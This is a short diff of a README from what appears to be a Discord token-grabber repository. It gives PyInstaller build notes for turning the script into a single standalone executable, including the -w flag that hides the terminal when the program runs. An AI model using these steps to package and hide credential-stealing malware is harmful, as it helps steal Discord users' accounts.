CxllZ/discordtokengrabber/README.txt

 pyinstaller --- module to convert it

--F --- make 1 standalone file (delete pycache and build folder) in the dist folder
+-F --- make 1 standalone file exe should be in the dist folder (delete pycache and build folder if u want)

 -w --- hides the terminal when executed